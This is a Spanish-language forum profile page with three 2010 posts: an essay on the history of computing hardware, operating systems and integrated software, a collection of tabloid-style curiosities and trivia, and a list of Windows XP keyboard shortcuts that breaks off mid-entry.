T

TheozZz

Usuario (Argentina)

Primer post: 11 jul 2010Último post: 13 sept 2010
11
Posts
32
Puntos totales
9
Comentarios
La Historia De La Informática
La Historia De La Informática
InfoporAnónimo7/16/2010

LA HISTORIA DE LA INFORMÁTICA 1.-SOPORTE FISICO : HARDWARE Los pioneros Al tiempo que se empiezan a construir máquinas para la gestión de la información contable, los hombres de ciencia quieren una máquina de tratamiento automático de datos científicos, un calculador científico. Desde el punto de vista de la ingeniería parece un objetivo más difícil, por la amplia gama de matices de la información a tratar en el mundo científico en relación al mundo administrativo y comercial; sin embargo, existe la gran ventaja de poder estandarizar con facilidad los problemas científicos en un lenguaje formal, como es el lenguaje matemático. La posibilidad de optar entre dos vías de actuación, o lo que es igual, de tomar y ejecutar una decisión se pudo implementar en los sistemas mecánicos primero mediante el concurso de la electricidad y, posteriormente, gracias al desarrollo de la tecnología, mediante la electrónica, pero en cualquier caso sobre la estructura tecnológica descansa una arquitectura lógica y matemática. Un relé clásico es el órgano elemental del razonamiento automatizado, en cuanto que puede adoptar dos posiciones: sí o no, verdadero o falso, cero o uno, según un convenio de transcripción de información previamente establecido; en el tema siguiente se verá cómo un número de relés suficientemente alto, convenientemente reunidos en serie (la salida de uno convertida en entrada del siguiente), o en paralelo (salidas paralelas y entradas paralelas), o en montaje híbrido (serie, paralelo) van a producir circuitos lógicos. Una vez que se logró simular físicamente un razonamiento lógico, todo el resto del desarrollo histórico del ordenador hasta hoy va a consistir en sustituir la tecnología primitiva de relés por tecnologías más avanzadas como válvulas de vacío, distintos tipos de transistores, circuitos integrados, etc. Conviene citar los trabajos de Shannon, entre una pléyade de científicos, matemáticos e ingenieros, como esenciales para lograr la conexión entre los aspectos físicos y los fundamentos lógicos que tienen lugar en un ordenador. En 1937 Howard Aiken, físico de la Universidad de Harvard, diseñó los planos para una máquina que obedecía órdenes consecutivas; dicha máquina fue construida por IBM y donada en 1944 a la Universidad de Harvard; se le llamó MARK I y fue la calculadora más potente con piezas electromecánicas. Ya se ha mencionado, en la introducción a este capítulo, que ENIAC fue el primer ordenador electrónico en el que el proceso de datos y su almacenamiento y el control de las operaciones se realizaba por medio de dispositivos electrónicos, los tubos de vacío, que hacen posible el salto del cálculo eléctrico al electrónico. En 1945, Von Neumann proponía diseñar y construir un ordenador que trabajase en sistema binario, capaz de almacenar en su interior los datos necesarios para la resolución del problema que se le plantease y con una memoria de mucha mayor capacidad que las conseguidas hasta ese momento. En 1949 se construía en la Universidad de Cambridge, en Inglaterra, el primer ordenador comercial destinado a la gestión; era un ordenador decimal que permitía utilizar caracteres alfabéticos, la entrada y salida de datos se realizaba por medio de tarjetas perforadas y utilizaba unidades de cinta magnética como memoria auxiliar. Generalidades en la historia de los ordenadores La base fundamental de la evolución de los ordenadores digitales ha sido el desarrollo de los componentes que forman su memoria y unidades de cálculo. Los ordenadores digitales, que son normalmente de uso general, trabajan directamente con los datos numéricos, representándolos por medidas de variables discretas, como son los impulsos eléctricos, los dientes de una rueda dentada, etc. Los ordenadores analógicos, dedicados a problemas específicos, trabajan con los números, transformándolos mediante escalas en medidas de variables continuas, como son longitudes, corrientes, fuerzas magnéticas, etc. Para aprovechar la rapidez del ordenador analógico y la precisión del digital, según los cálculos requieran una u otra característica, se han construido ordenadores «híbridos» de los dos tipos anteriores. Con este criterio se habla de cinco generaciones, hasta el momento presente, en la historia del ordenador. -Primera generación: se la suele situar cronológicamente entre 1950 y 1960. Es la etapa de las empresas iniciales del mundo informático, Remington Road (UNIVAC) e IBM, que no venden sino que alquilan los ordenadores, tales son los elevados costes que comportan. Es la generación de las válvulas de vacío, con un soporte de programas muy rudimentarios escritos en código máquina. -Segunda generación: la invención del transistor por W. Shockley va a marcar la diferencia con la primera generación; a principios de 1960 salen al mercado los primeros ordenadores transistorizados. En esta generación, que cubre de 1960 a 1964, además de la sustitución de las válvulas de vacío por transistores, tiene lugar la ampliación de las memorias internas, la generalización del concepto de arquitectura modificable, se usan periféricos de gran masa de memoria como los tambores y discos magnéticos y se reduce el tamaño de los ordenadores. Aparecen los lenguajes ensambladores que traducen las instrucciones del código máquina, llegando a generar ya lenguajes de alto nivel como FORTRAN, COBOL y ALGOL. -Tercera generación: abarca aproximadamente la década 1964-1974; se progresa considerablemente en la reducción de tamaño y aumento de la velocidad de cálculo, mediante la implementación de diferentes tecnologías de integración de transistores y otros circuitos de estado sólido. Se avanza mucho en software, desarrollando más lenguajes de alto nivel (PL1, BASIC, RPG, APL) y sistemas operativos, se inicia la programación estructurada, se construyen potentes compiladores e intérpretes, se generaliza el uso en las empresas de paquetes de software, bibliotecas de programas y bases de datos; aparecen las técnicas de tiempo compartido y la multiprogramación. Se generalizan los periféricos en la arquitectura de los ordenadores, dotando a los sistemas informáticos de una gran modularidad; se hace uso del teleproceso, de discos flexibles y de lectoras ópticas. En este momento es cuando se estructura el mercado de ordenadores constituyéndose las compañías que llegan hasta nuestros días: IBM, Control Data, Nixdorf, Philips, ICL, Bull, Bourroughs (hoy Unisys), NCR, Siemens, Fujitsu, etc. -Cuarta generación: mediante las técnicas de integración a gran escala se produce la revolución del microprocesador; el tamaño de los ordenadores se reduce a una décima parte con respecto a los de la anterior generación, se alcanzan velocidades multiplicadas por factores de 10, 50 y hasta 100, y se llegan a grandes masas de memoria en reducidísimos tamaños; todo ello gracias a la tecnología LSI (gran escala de integración). En Silicon Valley, INTEL Corporation produce el primer microprocesador, es decir, un «chip», una pieza única de tamaño muy reducido que contiene miles de componentes electrónicos y que pueden realizar cualquier tarea lógica constituyéndose en la unidad central de proceso de un ordenador; inmediatamente después salen al mercado los microprocesadores Z-80, 6800 de Motorola y otros. Basándose en los microprocesadores, aparecieron los ordenadores de uso personal: en el número de enero de 1975 de la revista «Popular Electronics» aparecía la descripción de un ordenador que podía comprarse sin armar por 395 $ o que podía obtenerse armado por 650 $; se llamaba «Altair 8800» y estaba basado en el microprocesador 8080 fabricado por la empresa Intel. Su diseñador y constructor era Edward Roberts que fundó una pequeña compañía instalada en un garaje de una casa de Alburquerque, Nuevo México. Roberts se quedó sorprendido del éxito pues sólo esperaba vender unos cientos de Altair y recibió miles de peticiones que no podía atender. Otro éxito espectacular en la historia de los negocios en los EE.UU. es la empresa Apple. Poco después de la aparición de Altair dos amigos apasionados por la electrónica, Stephen Wozniak y Steven Jobs, de 25 y 20 años respectivamente, fundaban Apple Computers Company con el exiguo presupuesto que provenía de la venta de un coche y de una calculadora programable y de un pequeño crédito; fabricaron un ordenador del que vendieron unas 175 unidades a unos 500 $ cada una, a pesar de que era un aparato de muy difícil uso pues no tenía teclado ni terminales. En 1977 lanzaron el modelo Apple II que constituyó un rotundo éxito; a finales de 1983 alcanzaron un volumen de ventas de mil millones de dólares. En 1981, IBM lanzaba con mucho retraso y mucha cautela, un ordenador personal, el PC (Personal Computer), del cual ese año vendieron ya 35 000 unidades y en 1983, 800 000, situándose en el primer lugar de las ventas de microordenadores para empresa. En estos últimos años han aparecido continuamente nuevas máquinas y casi todas las grandes empresas de material electrónico, material de oficina o calculadoras, americanas, europeas o japonesas están tratando de hacerse un hueco en este floreciente pero difícil mercado (muchas empresas de Silicon Valley y otros parques tecnológicos han quebrado por la dura competencia en el sector de las tecnologías de vanguardia). Al mismo tiempo que se producía este gran desarrollo de los PC's, se profundizaba en la investigación de los grandes ordenadores y de los superordenadores, como el CRAY-1, diseñado por Seymour R. Cray, que tiene una memoria interna superior a los 8 megabytes y realiza 200 . 106 operaciones por segundo; el CRAY llega a manejar en ampliaciones de memoria hasta 20 gigabytes. Otros superordenadores son el FALCOM, japonés y el Numerical Aerodinamic Simulation Facility. -Quinta generación: hoy día existen múltiples proyectos de investigación y experiencias ya realizadas o en curso de realización en el terreno de la Inteligencia Artificial (IA) y de los Sistemas Expertos, temas que se tratarán en un capítulo posterior. 2.- SOPORTE LOGICO : SISTEMA OPERATIVO. Un ordenador es, como ya hemos visto, una máquina que se dedica a «ejecutar programas». Pero hay muchas cosas que debemos decirle al ordenador, además de cuál es el programa que queremos ejecutar: con qué nombre se conoce el programa que nos interesa, cómo hay que organizar la memoria, donde están los ficheros que nuestro programa necesitará, dónde ha de guardar los que querremos grabar, etc. Todo esto y mucho más es necesario para hacer funcionar correctamente el ordenador. Evidentemente, no sería práctico que el operador tuviese que dar, de la manera que fuese, todas las instrucciones cada vez. De manera que hay que buscar algún procedimiento que haga de intermediario entre el operador y el hardware. Se podrían incluir todas estas funciones dentro de cada uno de los programas (de hecho, en los ordenadores más primitivos se incluían), pero es evidente que un conjunto tan amplio y tan complejo no puede estar dentro de cada programa sin que el resultado sea necesariamente poco ágil. Además, esto exigiría que las instrucciones de cada uno de los posibles programas fueran compatibles, y haría prácticamente imposible que el ordenador pudiera ejecutar más de un programa a la vez, como hoy es habitual. Por todo esto y muchas otras razones, pronto se vio que era mucho mejor que hubiera un programa (un conjunto de programas en realidad) que hiciera todas estas funciones comunes. Esto es precisamente lo que se llama sistema operativo. El sistema operativo de un ordenador es, pues, un conjunto de programas que tienen el objetivo básico de ampliar el potencial y la utilidad global del sistema, completando el hardware disponible con ciertas funciones nuevas o más potentes, como por ejemplo la carga y descarga automática de programas en función del espacio de memoria disponible, la gestión de los distintos periféricos, el control de la ejecución automática de los programas, con detección automática de determinados tipos de errores, el análisis de los recursos utilizados por los distintos programas, no sólo por motivos contables, sino también para facilitar su acceso bajo condiciones controladas, etc. El sistema operativo también mantiene la comunicación con el operador del sistema, tanto para tenerlo informado de los trabajos en curso como para pedir, si hace falta, su intervención. 3.- SOPORTE LÓGICO: SOFTWARE DE APLICACIÓN SOFTWARE INTEGRADO Concepto de software de base En la práctica, los programas correspondientes a todos estos tipos de tarea han sido desarrollados separadamente (incluso por empresas diferentes). Así, la manera como cada programa guarda los datos en los ficheros puede ser, y de hecho es, muy diferente. Hasta el punto que, si tomamos dos aplicaciones al azar, es muy probable que no podamos hacer el traspaso de información de una a otra si, previamente, no hemos hecho algunas operaciones especiales. No obstante, la necesidad de realizar este traspaso ha cobrado importancia a medida que el uso en paralelo de los programas citados se ha ido demostrando imprescindible. Concepto de paquete integrado Este problema ha ido hallando solución por medio de la integración: la capacidad de las diversas aplicaciones de dialogar entre sí y compartir la información. Un método de integración consiste en la creación de estándares, que permitan acceder a ficheros grabados por otra aplicación (por ejemplo, los llamados ficheros ASCII); un paso adelante, en este sentido, lo ha dado la capacidad de ciertas aplicaciones de leer ficheros que tienen el formato específico de otra aplicación, mediante los oportunos programas de conversión. Muchas aplicaciones actuales ya han sido pensadas para ser utilizadas conjuntamente con otras relacionadas, y se diseñan de forma que los ficheros respectivos sean exportables entre ellas. Es el caso, por ejemplo, de Word, AmiPro con Lotus o Excel o DBase. Pero no podemos hablar de verdadera integración hasta la aparición de los llamados paquetes integrados, es decir, piezas de software que contienen varias de las aplicaciones antes mencionadas, las más frecuentes para un usuario medio: el procesador de textos, la hoja de cálculo, la base de datos y los gráficos, reunidos en un mismo entorno de trabajo. Paquetes integrados: ventajas El uso de los paquetes integrados tiene ventajas evidentes: no solamente resuelve de manera automática el traspaso de información entre sistemas diversos, sino que ofrece al usuario la tranquilidad de trabajar en un ambiente estable. Esto significa que el usuario no ha de aprender el significado y funciones de cada tecla, y los mandatos específicos de cada programa, ya que el entorno de trabajo y las teclas funcionales soportan siempre las mismas funciones. Existen en el mercado diversos paquetes de este tipo: por nombrar sólo los más conocidos, podemos citar: Open Acces, Symphony, Framework...

0
0
C
Curiosidades y cosas que por ahí no sabias :)
InfoporAnónimo7/11/2010

¿Sabías que los peces ‘platican’ pero solo en ocasiones especiales? A esa conclusión llegaron científicos de la Universidad de Auckland en Nueva Zelanda. Ellos afirman que los peces pueden llegar a ser parlanchines, refunfuñar, gruñir y hasta gritarse unos a otros a partir de una vejiga que emplean para nadar, según demuestran las grabaciones realizadas por estos expertos. Un investigador marino explica que aunque todos los peces son capaces de oír no todos saben general sonidos mediante la vibración de la vejiga natatoria, un músculo que pueden contraer. Los peces hablan entre sí por diversas razones, por ejemplo lo hacen cuando quieren atraer a sus parejas, orientarse o asustar a sus depredadores. ¿Como estudiaron a estos peces? Para ello situaron a los peces en un tanque, y tras semanas de aclimatación, comenzaron a grabar sus sonidos. Los investigadores afirmaron que estaba 99 por ciento seguros de que se trataba de sonidos de peces, pero aún así eso nos lo hace estar satisfechos pues ahora buscan la manera de saber que signifado tienen sus sonidos.queremos saber qué significan”, ha añadido. De este modo han comprobado que algunos cangrejos hacen ruido, de igual forma que otros peces de ojos grandes. No obstante, algunos peces sólo ‘hablan’ en ocasiones especiales. Concretamente, Ghazali observó que la mayor parte de los bacalaos eran silenciosos pero muy ruidosos mientras estaban desovando. “La hipotesis consiste en que emplean estos sonidos como sincronización para la fertilización de los huevos. Después de la época de cría no volverás a oír esos sonidos”, ha añadido el científico, al tiempo que ha considerado que los depredadores podrían cazar y encontrar a sus presas mediante el habla de estos peces, según recoge en estudio publicado en el periódico New Zealand Herald. Una mujer de 77 años es la única mujer del mundo en haber alcanzado el grado de 7° Dan de Ju-Jitsu. Ena Mallett de Norfolk es una abuelita que ha alcanzado el grado de Cinturón Negro Séptimo Dan en Ju-Jitsu. Empezó haciendo Karate en 1979 como una manera de mantenerse en forma y se transformó en una instructora internacional de Spirit Combat en 1987. La mujer explica que está bastante grande pero que todavía puede lidiar con cualquier grandulón durante sus prácticas. La señora además ayuda a cruzar a niños y ancianos en su vecindario. Ena también da clases semanales de artes marciales a niños y adultos en la localidad de South Walsham. Un empresario ruso pagó 30.000 dólares por una vuvuzela de dos dólares bañada en oro e incrustada en piedras preciosas. Klemens Pointner es un joyero basado en Linz que se especializa en proveer ítems de lujo hechos a medida para las personas más solventes de Moscú. Si bien se negó a revelar la identidad de su cliente explicó que "un contacto me preguntó si podía modificar una vuvuzela para un acaudalado fanático del fútbol. Y le dije que sí." "La parte más difícil en realidad fue encontrar una vuvuzela, porque no hay en Austria así que importamos una especialmente desde Sudáfrica", explicó Klemens. La misma fue bañada en oro blanco e incrustada con diamantes. El orfebre tuvo que apurar su trabajo porque el destinatario la quería para usarla en la final de la Copa del Mundo. Pierde media cabeza en brutal caída Alan Hind tiene 28 años y vive sin un tercio de su cráneo debido a un accidente laboral. El joven cayó de una altura de casi ocho metros cuando trabajaba en el derribo de un edificio en Carlisle, Gran Bretaña. El accidente le causó graves fracturas en el cráneo y la mandíbula inferior, la pérdida de la vista de un ojo, de la audición de un oído y daño cerebral irreparable. Después de seis meses y tres complejas operaciones despúes de su caída, su cerebro seguía tan destrozado que los médicos tuvieron que quitarle una parte del mismo y le adaptaron una placa para sustituir una importante parte del cráneo. Desde entonces Hind lleva una placa de titanio para reemplazar una gran parte del cráneo destrozado. A pesar de la prótesis de titanio, Hind perdió la memoria, e incluso cambió su temperamento. Según las autoridades judiciales, el patrón de Hind es responsable del accidente, por haber infringido los reglamentos sobre seguridad laboral. Fuente: AOL Noticias. ¿Por qué soñamos? Los sueños han sido y son objeto de estudio permanente. Desde los tiempos más remotos hasta nuestros días, la humanidad busca respuestas a un fenómeno que ha tenido interpretaciones de todo tipo: desde espiritual (contacto con espíritus, magia...) hasta un punto de vista más científico (liberación de estrés y situaciones que generan traumas). En Livescience han recogido una nueva estos días: soñar es como pensar cuando estamos despiertos, aunque con matices diferentes, por lo que es posible resolver problemas cuando dormimos. La teoría es de Deirdre Barrett, psicóloga de la Universidad de Harvard, quien defiende que "los sueños han evolucionado con el ser humano, de modo que han perfeccionado sus grandes funciones: ayudar al cerebro a 'reiniciarse' y resolver problemas". El estudio, presentado el pasado mes en la Association for Psychological Science, argumenta que los sueños siguen, en la mayoría de ocasiones, una línea argumental irracional y carente de sentido lógico, por lo que se concluye que estos son una forma de pensar y resolver problemas diferente a cómo lo hacemos cuando estamos despiertos. "Freud estaba equivocado" Si existe un personaje ligado al mundo de los sueños, ese es Sigmund Freud. Barret critica las explicaciones que el médico austriaco dio en su momento. "Freud no tuvo en cuenta la evolución humana y explicaba los sueños como una gratificación a nuestros deseos en un mundo imaginario que poco servía en nuestra vida real", explica. Otros estudios han explicado los sueños como un efecto secundario que se produce durante la fase REM, bien para que descansen partes del cerebro no activas, bien para reponer sustancias químicas del cerebro como los neurotransmisores. Incluso existen especialistas que han llegado a comparar los sueños con los salvapantallas del ordenador, como hizo el psicólogo Steven Pinker. Barrett no entiende cómo no se ha tenido en cuenta la evolución humana en el estudio de los sueños: "Si no hubiesen evolucionado durante tantos miles de años junto al ser humano, probablemente no existirían y no supondrían un mecanismo que aporte una ventaja competitiva", concluye. Un constructor de botes entrenó a ratones para que puedan hacer surf. Shane Wilmott, de 39 años, construye hermosas tablas de surf en miniatura para que su peculiar troupe de roedores realice proezas en las olas. Al parecer, los ratones controlan la trayectoria balanceando el peso de sus menudos cuerpos. Wilmott -que cría estos animalitos en su casa de Gold Coast, Australia- explica que "en contra de la idea popular, los ratones son nadadores increíbles así que cuando caen de las tablas nadan hasta que yo los recojo". "Lo hago porque considero que están seguros. Estos muchachitos no son sólo mis mascotas, son mis compañeros así que me preocupo mucho por ellos". 10 hechos cientificos que seguramente no sabias 1. Las gallinas se pueden hipnotizar Una gallina puede ser hipnotizada (o hacerla entrar en trance) simplemente sosteniendo su cabeza contra el suelo, a la vez que se dibujan repetidamente, con un palo o el dedo, líneas en la tierra, desde su pico y en línea recta hacia el exterior. Si se consigue hipnotizar a la gallina de esta forma, el animal permanece completamente inmóvil por hasta 30 minutos, con sus ojos clavados en la línea. 2. Se puede tener una erección ya muerto Una erección post mortem (también conocida en inglés como “angel lust”) ocurre cuando el individuo fallece verticalmente o panza abajo, y el cadáver permanece en esa posición. En vida el corazón bombea la sangre, lo que hace que se distribuya uniformemente entre todos los vasos sanguíneos del cuerpo humano. Una vez que el mecanismo deja de funcionar sólo la fuerza de gravedad actúa sobre la sangre. Al igual que con cualquier otra masa inerte, la sangre se reacomoda en el punto más bajo del cuerpo, causando edemas e hinchazones allá donde se acumula. 3. Tu mano puede tener vida propia El síndrome de la mano extraña o síndrome de la mano ajena (tal y como aparece en películas como “¿Teléfono rojo?, volamos hacia Moscú” o “El diablo metió la mano“) es un desorden mental raro en el cual una de las manos de quien lo padece parece adquirir vida propia. El síndrome es más común en casos de personas las cuales han tenido una cirugía de separación de hemisferios cerebrales, un procedimiento usado en ocasiones para relajar los síntomas de casos extremos de epilepsia. También ocurre en algunos otros casos de cirugía cerebral, golpes cerebrales o infecciones. 4. Reír demasiado podría matarte La hilaridad fatal es la muerte producida como resultado de la risa. En el siglo tercero antes de Cristo el filósofo griego Crisipo de Soles moría a causa del ataque de risa provocado tras ver a un burro comiendo higos [¿?]. También hay casos recientes bien documentados. El 24 de Marzo de 1975, Alex Mitchell, un albañil británico de 50 años, moría literalmente de la risa mientras contemplaba un episodio de “The Goodies” (una serie de humor para televisión). Según su esposa, testigo de los hechos, Mitchell no pudo dejar de reírse mientras observaba un sketch del programa, en el cual su protagonista, vestido con falda tradicional escocesa, usaba varias gaitas para defenderse de una morcilla psicópata. Tras veinticinco minutos de risa ininterrumpida Mitchell se derrumbaba del sofá y perecía de un colapso cardiaco. Tiempo después su viuda enviaba a “The Goodies” una carta agradeciéndoles el haber hecho los últimos instantes de vida de Mitchell tan placenteros. 5. Un arma podría hacerte gay El Ejército de los EE UU estudió fabricar una bomba para provocar la homosexualidad en el enemigo y con ello «minar la moral y la disciplina» de las tropas. La idea era lanzar agentes químicos capaces de alterar las hormonas y hacer que los soldados se sintieran «irresistiblemente atraídos entre sí». Parece una broma, pero el proyecto fue presentado con toda seriedad al Pentágono en 1994, con un presupuesto previsto de 7,4 millones de dólares para el desarrollo y producción masiva durante seis años de esta arma y otras no menos descabelladas (como la posibilidad de rociar a los enemigos con una sustancia que provocara halitosis «grave y continuada» o mal olor, para hacerlos «fácilmente identificables»). 6. Es cierto, los hombres pueden dar el pecho El fenómeno de lactación masculina en humanos se ha convertido en algo común durante los últimos años debido al uso de medicamentos que estimulan las glándulas mamarias de los varones. La lactación masculina es provocada con frecuencia por tratamientos hormonales suministrados a los hombres que sufren de cáncer de próstata. También es posible el inducirla, tanto en varones como hembras, mediante masajes constantes y succiones en el pezón, durante largos periodos de tiempo (meses). 7. El “tomaco” (mitad tomate, mitad tabaco) existió El “tomaco” fue en un principio una fruta híbrida ficticia aparecida en un episodio de 1999 de los Simpsons. El método usado para crear el “tomaco” en dicho espacio era ficticio. Pero el “tomaco” se hizo realidad cuando, supuestamente, fue producido en 2003. Inspirado por los Simpsons, Rob Baur, consiguió injertar sobre las raíces de una planta de tabaco una planta de tomate. Teóricamente es posible debido a que ambas plantas vienen de la misma familia. 8. No pasa nada por tener un tercer pezón Pezones supernumerarios (también conocido como tercer pezón o politelia) es el fenómeno biológico por el cual los mamíferos, humanos incluidos, llegan a tener un pezón de más (sin glándula mamaria). Generalmente se encuentran en la línea mamaria que sigue a los pezones en el tórax hacia el abdomen. Si son de gran tamaño, deben extirparse. Por lo general son pequeños y se los confunde con verrugas. El cantante, modelo y actor estadounidense Mark Wahlberg tiene un tercer pezón bajo el pectoral izquierdo. En 2005 estudió la posibilidad de extirpárselo, para acabar decidiendo mantenerlo. 9. Se puede morir en el inodoro Existen muchos casos de lesiones, y alguno de muerte, relacionados con los inodoros a lo largo de la historia (además de muchas leyendas urbanas). En los niños, una de las causas más comunes de lesión genital se produce cuando la tapa del váter se cae mientras usan el inodoro. Jorge II de Gran Bretaña moría en un retrete, debido a una disección de la aorta, el 25 de Octubre de 1760. Según las memorias de Horace Walpore, el rey Jorge “se levantó como siempre a las seis, y desayunó su chocolate; para todas las actividades era invariablemente metódico. Quince minutos después de las siete entraba en un pequeño retrete rudimentario. Su ayudante de cámara, mientras lo esperaba, oyó un ruido; al entrar encontraba al rey muerto en el suelo.” 10. Comerse los mocos es sano Mucofagia (literalmente comerse los mocos) es la ingesta de mucosidad nasal, mocos, y otros detritus obtenidos al sonarse la nariz. Varias investigaciones sugieren que la mucofagia, además de una actividad natural, puede ser incluso saludable, al exponer al sistema digestivo las bacterias acumuladas en los mocos, ayudando con ello a fortalecer el sistema inmunológico. Dos Años Viviendo en Cabina Telefónica Un hombre que se niega a identificarse o a hablar con los demás vive en una caseta telefónica en Dalian, China. El hombre descansa durante el día en la cabina a pesar de su reducido espacio y a la noche sale a mendigar por el barrio. Duerme hecho una bolita encima de frazadas y almohadones. También le ha agregado con el tiempo algunas "comodidades" a su habitáculo. Del techo cuelgan sus prendas y tiene repisas donde apila botellas de agua y cajas con comida. Para su higiene personal utiliza los servicios sanitarios públicos. La cabina queda en la concurrida plaza Zhongshan del centro de la ciudad y si bien la gente quiere ayudarlo a encontrar a su familia él se rehúsa a hablar con nadie (paradójicamente). Tomar café es beneficioso para las personas con problemas cardiacos Las personas con problemas cardíacos pueden tomar un par de cafés al día sin ningún riesgo, es más, les resultaría hasta beneficioso, siempre y cuando su presión arterial sea normal. Así lo ha demostrado un estudio realizado en la Universidad Harokopio y el Hospital Hippokration en Atenas. Y es que según esta investigación, beber pequeñas cantidades de café diariamente puede ayudar a estos pacientes a evitar problemas más graves. En el estudio participaron 374 personas que sufrieron un ataque al corazón o un episodio coronario grave. Los científicos llegaron a la conclusión de que quienes tenían una presión normal y bebían uno o dos cafés al día eran un 88% menos propensos que quienes no lo tomaban a contraer una dolencia en la que el corazón deja de bombear sangre correctamente. El hallazgo es sorprendente ya que el café fuerte puede generar palpitaciones y nunca se había recomendado a pacientes con afecciones cardiacas. Sin embargo, es una fuente rica en antioxidantes y ácido clorogénico, que se cree que son elementos protectores y necesarios para el organismo. Un cartero en Alemania se casó con su gata luego de que el veterinario le dijera que el felino no iba a vivir mucho más. Uwe Mitzscherlich, un cartero de 39 años residente de Dresden, se casó con Cecilia, su gata, quien vistió ceremonial atuendo de blancos velos. El hombre explicó que quería llevar adelante la ceremonia antes de que su querida mascota -que padece obesidad y asma- muriera. "Cecilia es una criatura fiel. Nos acostamos a la misma hora y siempre ha dormido en mi cama. Nuestros corazones laten al unísono. ¡Es única!", relató emocionado. Dado que el matrimonio claramente no está previsto en la ley, Uwe pagó 400 dólares a una actriz televisiva, Christin-Maria Lohri, para que oficiara la ceremonia, mientras que el hermano gemelo del "novio" fue testigo. ¿Sabías que dormir menos de 6 horas te puede matar? Dormir constantemente por menos de seis horas por noche puede derivar en una muerte prematura para la persona, pero dormir demasiado también puede acarrear graves problemas, según revela un nuevo estudio. Y es que en el mundo tan atareado en el que vivimos la gente dedica poco tiempo a dormir, especialmente aquellas que tienen un trabajo de tiempo completo, lo que esto se debe en gran parte al estrés y las presiones laborales. Los expertos del Reino Unido e Italia analizaron datos de un total de 16 diferentes estudios a lo largo de Europa, Estados Unidos y Asia durante 25 años, cubriendo a más de 1.3 millones de personas y más de 100 mil muertes, que muestran evidencia real del poderoso daño que puede causar malos hábitos de sueño. De acuerdo con el estudio, aquellos que generalmente duermen menos de seis horas por noche tenían 12% más de posibilidades de experimentar una muerte prematura en sus primeros 25 años de vida que los que suelen dormir de seis a ocho horas diarias. Otro de los hallazgos fue que aquellos que constantemente duermen más de nueve horas por noche son propensos a contraer más enfermedades.”Los periodos prolongados de sueño pueden representar un indicador muy fuerte de mala salud”, señala el profesor Francesco Cappuccio, quien lideró el estudio. Por otro lado, el deterioro de los niveles de salud en diferentes sectores generalmente va acompañado de la extensión de las horas de sueño. Por eso, duerme bien y tendrás una vida saludable Fuentes: TheDaniex, AOL Noticias, Infobae. Visita mis otros post alguno te tiene que interezar!!!

0
0
Todos los atajos del teclado en windows xp.
Todos los atajos del teclado en windows xp.
InfoporAnónimo9/13/2010

Bueno estube dando vueltas por ahi y encontre esto abajo dejo la fuente Atajos de teclado básicos * CTRL + C (Copiar) * CTRL + X (Cortar) * CTRL + V (Pegar) * CTRL + Z (Deshacer) * SUPR (Eliminar) * MAYÚS + SUPR (Eliminar el elemento seleccionado permanentemente sin enviarlo a la Papelera de reciclaje) * CTRL mientras arrastra un elemento (Copiar el elemento seleccionado) * CTRL + MAYÚS mientras arrastra un elemento (Crear un acceso directo al elemento seleccionado) * Tecla F2 (Cambie el nombre del elemento seleccionado) * CTRL + FLECHA DERECHA (Mover el punto de inserción al principio de la siguiente palabra) * CTRL + FLECHA IZQUIERDA (Mover el punto de inserción al principio de la palabra anterior) * CTRL + FLECHA ABAJO (Mover el punto de inserción al principio del párrafo siguiente) * CTRL + FLECHA ARRIBA (Mover el punto de inserción al principio del párrafo anterior) * CTRL + MAYÚS con cualquiera de las teclas de dirección (Resaltar un bloque de texto) * MAYÚS con cualquiera de las teclas de dirección (Seleccionar más de un artículo en una ventana o en el escritorio, o seleccionar texto en un documento) * CTRL + A (Seleccionar todos) * Tecla F3 (Buscar un archivo o una carpeta) * ALT + ENTER (Ver las propiedades del elemento seleccionado) * ALT + F4 (Cerrar el elemento activo, o salir del programa activo) * ALT + ENTER (Mostrar las propiedades del objeto seleccionado) * ALT + BARRA ESPACIADORA (Abrir el menú de la ventana activa) * CTRL + F4 (Cierra el documento activo en programas que le permiten tener varios documentos abiertos simultáneamente) * ALT + TAB (Cambiar entre los temas abiertos) * ALT + ESC (Ciclo de los artículos que en el orden en que se había abierto) * Tecla F6 (ciclo a través de los elementos de la pantalla en una ventana o en el escritorio) * Tecla F4 (Mostrar lista de la barra de direcciones en Mi PC o el Explorador de Windows) * MAYÚS + F10 (Mostrar el menú contextual del elemento seleccionado) * ALT + BARRA ESPACIADORA (Mostrar el menú Sistema de la ventana activa) * CTRL + ESC (Mostrar el menú Inicio) * ALT + letra subrayada en un nombre de menú (Mostrar el menú correspondiente) * Letra subrayada en el nombre de un comando en un menú abierto (Realizar el comando correspondiente) * Tecla F10 (Activar la barra de menús en el programa activo) * FLECHA DERECHA (Abra el siguiente menú a la derecha, o abrir un submenú) * Flecha izquierda (Abra el siguiente menú a la izquierda, o cerrar un submenú) * Tecla F5 (Actualizar la ventana activa) * Tecla Retroceso (Ver la carpeta un nivel en Mi PC o el Explorador de Windows) * ESC (Cancelar la tarea actual) * MAYÚS al insertar un CD-ROM en la unidad de CD-ROM (Impedir la unidad de CD-ROM de forma automática la reproducción) Atajos de teclado para cuadros de diálogo * CTRL + TAB (Avanzar a través de las pestañas) * CTRL + SHIFT + TAB (Mover hacia atrás a través de las pestañas) * TAB (Avanzar por las opciones) * SHIFT + TAB (Mover hacia atrás por las opciones) * ALT + letra subrayada (Realizar el comando correspondiente o seleccionar la opción correspondiente) * ENTER (Realizar el comando de la opción activa o botón) * BARRA ESPACIADORA (Seleccione o desactive la casilla de verificación si la opción activa es una casilla de verificación) * Teclas de dirección (Seleccionar un botón si la opción activa es un grupo de botones de opción) * Tecla F1 (Mostrar Ayuda) * Tecla F4 (Mostrar los elementos de la lista activa) * Tecla Retroceso (Abrir una carpeta de un nivel si una carpeta se selecciona Guardar como en el cuadro de diálogo Abrir) Atajos de teclado para funciones Windows Microsoft * Logotipo de Windows (Mostrar u ocultar el menú Inicio) * Logotipo de Windows + INTER (Mostrar el cuadro de diálogo Propiedades del sistema) * Logotipo de Windows + D (Mostrar el escritorio) * Logotipo de Windows + M (Minimiza todas las ventanas) * Logotipo de Windows + SHIFT + M (Restore the minimized windows) Logotipo de Windows + MAYÚS + M (Restaurar las ventanas minimizadas) * Logotipo de Windows + E (Abre Mi PC) * Logotipo de Windows + F (Buscar un archivo o una carpeta) * Logotipo de Windows + Ctrl + F (Buscar equipos) * Logotipo de Windows + F1 (Mostrar la Ayuda de Windows) * Logotipo de Windows + L (Bloquear el teclado) * Logotipo de Windows + R (Abre el cuadro de diálogo Ejecutar) * Logotipo de Windows + U (Abre el Administrador de utilidades) Atajos de teclado de accesibilidad * SHIFT derecho durante ocho segundos (Switch FilterKeys encendido o apagado) * ALT + SHIFT + IMPR PANT (Switch de alto contraste encendido o 